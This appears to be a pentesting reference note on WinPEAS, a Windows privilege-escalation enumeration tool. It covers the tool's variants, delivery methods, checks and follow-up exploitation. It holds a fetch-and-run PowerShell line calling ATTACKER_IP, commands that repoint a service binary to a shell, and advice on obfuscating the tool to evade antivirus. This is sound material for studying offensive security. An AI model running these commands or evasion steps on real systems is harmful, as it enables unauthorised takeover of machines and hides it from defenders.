WinPEAS
WinPEAS.md
WinPEAS
Overview
WinPEAS (Windows Privilege Escalation Awesome Script) is the Windows counterpart to LinPEAS. It enumerates hundreds of local privilege escalation vectors on Windows systems, including unquoted service paths, AlwaysInstallElevated, weak permissions on services, stored credentials, and more.
Category
#privilege-escalation #post-exploitation #windows
Phase
Privilege Escalation
Part Of
PEASS-ng (Privilege Escalation Awesome Scripts Suite) GitHub: github.com/carlospolop/PEASS-ng
Variants
| File | Notes |
|---|---|
winPEAS.exe |
Compiled .NET executable (most features) |
winPEASany.exe |
.NET any CPU — runs on 32/64-bit |
winPEAS.bat |
Batch script fallback (no .NET needed; less thorough) |
winPEASps1.ps1 |
PowerShell version (AV often catches this) |
Getting WinPEAS onto a Target
# Method 1: Download via PowerShell (if internet allowed)
certutil -urlcache -split -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe C:\Temp\winpeas.exe
# Method 2: Invoke-WebRequest
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8080/winPEASps1.ps1')
# Method 3: SMB share from attacker (no file on disk)
\\ATTACKER_IP\share\winPEASany.exe
# Method 4: Meterpreter upload
meterpreter > upload /local/winpeas.exe C:\\Windows\\Temp\\winpeas.exe
meterpreter > shell
C:\Windows\Temp\winpeas.exe
Running WinPEAS
# Full run
winPEASany.exe
# Specific category only
winPEASany.exe systeminfo
winPEASany.exe userinfo
winPEASany.exe servicesinfo
winPEASany.exe applicationinfo
winPEASany.exe networkinfo
winPEASany.exe windowscreds
winPEASany.exe filesinfo
# Output to file
winPEASany.exe > C:\Temp\output.txt
# Quiet (no color codes)
winPEASany.exe quiet
Output Color Legend
| Color | Meaning |
|---|---|
| 🔴 Red | Critical finding — likely privesc path |
| 🟡 Yellow/Cyan | Notable/interesting |
| Green | Currently applied to current user context |
| White | General info |
To view colors properly, run in a terminal that supports ANSI (ConEmu, Windows Terminal, or redirect through a colored viewer).
What WinPEAS Checks
System Info
- OS version / build → potential kernel/OS exploits
- Hotfixes installed (missing patches)
- PowerShell version, .NET versions
User & Group Info
- Current user privileges (
whoami /priv) - Local users and groups
- Logged-in users
- Token privileges (SeImpersonatePrivilege, SeDebugPrivilege, etc.)
Service Misconfigurations
- Unquoted service paths — paths with spaces and no quotes
- Weak service permissions — user can modify service binary
- Modifiable service registry keys
- Services running as LocalSystem with writable binaries
Registry Checks
AlwaysInstallElevated(MSI files run as SYSTEM)- AutoRun keys pointing to writable locations
- Stored credentials in registry
Stored Credentials
- Windows Credential Manager
- DPAPI master keys
- Stored WiFi passwords
- SAM/SYSTEM file accessibility (shadow copies)
- LAPS (Local Administrator Password Solution) data
Scheduled Tasks
- Tasks running as higher-privilege users with writable scripts/binaries
File System
- Writable directories in PATH
- Interesting files (passwords in config/log files)
- Recently modified files
Network
- Listening ports not visible externally (pivoting targets)
- ARP/hosts table
- DNS configuration
Key Findings to Act On
# Unquoted service path
sc qc "Service Name"
# If path: C:\Program Files\Some Service\service.exe
# Try writing: C:\Program.exe or C:\Program Files\Some.exe
# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both = 1, create a malicious .msi with msfvenom
# SeImpersonatePrivilege → Potato attacks
# Use PrintSpoofer, RoguePotato, or GodPotato
# Weak service perms
sc config "Service" binpath= "C:\Temp\shell.exe"
net stop "Service" && net start "Service"
Potato Attacks (SeImpersonatePrivilege)
If WinPEAS shows SeImpersonatePrivilege is enabled:
- PrintSpoofer — github.com/itm4n/PrintSpoofer
- GodPotato — github.com/BeichenDream/GodPotato
- RoguePotato — github.com/antonioCoco/RoguePotato
LOLBAS Reference
For Windows-native binary abuse (equivalent of GTFOBins): lolbas-project.github.io
OPSEC Notes
winPEASany.exeis flagged by most AV/EDR solutions. Obfuscate or compile from source with modified strings. Run viacmd.exespawned in Meterpreter or use the .bat version as a fallback. Avoid writing to C:\Temp on monitored systems — useC:\Windows\Tasksor user-writable paths.
Related Tools
- LinPEAS — Linux equivalent
- Meterpreter — Common delivery vehicle; run
load powershellto stage WinPEAS - Metasploit →
post/multi/recon/local_exploit_suggester— automated Metasploit-native privesc suggestion
Tags
#ethical-hacking #privilege-escalation #windows #post-exploitation #enumeration